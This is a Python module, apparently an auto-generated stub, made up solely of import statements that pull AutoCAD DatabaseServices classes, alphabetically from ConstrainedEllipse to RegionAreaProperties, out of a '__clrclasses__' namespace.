from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedEllipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedImplicitPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedRigidSet
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedSpline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstraintGroupNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ContentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Curve
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CustomObjectSnapMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CustomScale
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterProvider
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterSourceFilesException
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Database
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseIOEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseIOEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseSummaryInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseSummaryInfoBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataCell
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataCellCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLink
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkGetSourceContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataTypeParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBDictionary
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBDictionaryEntry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DbDictionaryEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DbHomeView
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectReferenceCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBText
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBVisualStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DecomposeForSaveReplacementRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DeepCloneType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DefaultLightingType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbol
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbolBoundaryType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbolOverriddenProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewIdentifierPlacement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewModelEdge
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnUnderlayItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DiametricDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DictionaryWithDefaultDictionary
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimArrowFlag
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Dimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimensionCenterMarkType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimensionStyleOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimStyleTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimStyleTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DistanceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DragStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawLeaderOrderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawMLeaderOrderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawOrderTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DuplicateRecordCloning
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwfDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwfReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwgFiler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwgVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DxfCode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DxfFiler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferenceProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyUnitsType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EdgeRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ellipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EndCap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Entity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityAlignmentEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityAlignmentEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityVisualStyleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EnumConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualCurvatureConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualDistanceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualHelpParameterConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualLengthConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualRadiusConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EraseFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ExplicitConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Extents2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Extents3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ExtrudedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Face
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FaceRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FaceRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FeatureControlFrame
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Field
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldCodeFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldCodeWithChildren
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationResult
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationStatusResult
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldFilingOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileDependencyInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileDependencyManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileOpenMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FilerType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FilletTrimMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FindFileHint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FitData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FixedConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FlowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Font
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FormatOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FormattedTableData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FrameSetting
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FullDwgVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FullSubentityPath
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import G2SmoothConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateCategory
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateSystem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateTransformer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSProjectionCode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSUnit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoLocationData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeomapImage
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeometricalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeometryOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeomRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoPositionMarker
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GetGripPointsFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientColor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientPatternType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Graph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphicsMetafileType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphNodeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridLineStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridLineType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridPropertyParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripModeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GroundPlaneBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Group
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GsMarkType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Handle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Hatch
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchEdgeType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchLoop
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchLoopTypes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchObjectType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchPatternType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Helix
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HelpParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HighlightOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HighlightStateOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HorizontalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HostApplicationServices
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HyperLink
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HyperLinkCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IBLBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMapping
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMappingEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMappingEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdPair
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Image
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageDisplayOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageQuality
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImplicitPointType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IndexCreation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import InterferenceProtocolExtension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Intersect
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ISpecialValueConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ISubObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ItemLocator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ITextEditorSelectable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import JoinStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LampColorPreset
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LampColorType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerEvaluation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateDeletedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateDeletedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateMasks
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateRenameEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateRenameEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerViewportProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Layout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutCopiedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutCopiedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutRenamedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutRenamedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Leader
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LeaderDirectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LeaderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Light
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LightingUnits
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Line
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineAngularDimension2
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineSpacingStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinetypeTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinetypeTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineWeight
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineWeightConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinkedData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinkedTableData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsCheckCurvesOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsNormalOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftProfile
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LongTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LongTransactionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MaintenanceReleaseVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MatchProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Material
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeasurementValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MentalRayRenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MergeCellStyleOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshFaceterData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshPointMap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshPointMaps
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MidPointConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MInsertBlock
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MLeader
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MLeaderStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Mline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineJustification
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElementCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MlineStyleElementCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelDocViewLabelAlignmentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelDocViewLabelAttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModelerFlavor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ModifiesOwnerAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MoveGripPointsFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MoveType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MText
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragmentCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MTextFragmentCallbackStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MultiModesGripPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NewLayerNotification
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NormalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Notifier
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NurbsData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import NurbSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectClosedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectClosedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectContextManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectErasedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectErasedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdGraph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectIdGraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectSnapModes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ObjectTypeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ole2Frame
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenCloseTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OpenModeAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OrdinateDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OrthographicView
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import OsnapOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PaperOrientationStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParallelConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSet
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetIncrement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetList
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParameterValueSetMinMax
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ParseOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PasswordOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PathOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PathRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PatternDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PCAdsName
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PdfDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PdfReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PerpendicularConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PhysicalIntensityMethod
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlaceHolder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Planarity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlaneSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotPaperUnit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotRotation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettingsShadePlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotSettingsValidator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleDescriptor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleNameType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleTableChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotStyleTableChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PlotType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Point3AngularDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloud
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudClassificationColorRamp
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorMap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorRamp
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudColorSchemeChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudCrop
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudCropType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudDefEx
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudDispOptionOutOfRange
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudEx
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudItemType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudPropertyState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCloudStylizationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCoincidenceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PointCurveConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Poly2dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Poly3dType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyFaceMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyFaceMeshVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolygonMesh
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolygonMeshVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Polyline3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolylineVertex3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PolyMeshType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Profile3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import PropertiesOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyEntity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyResurrectionCompletedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ProxyResurrectionCompletedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadialDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadialDimensionLarge
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RadiusDiameterConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RapidRTRenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RapidRTRenderTarget
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterImage
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterImageDef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RasterVariables
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ray
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Rectangle3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegAppTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegAppTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Region
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import RegionAreaProperties
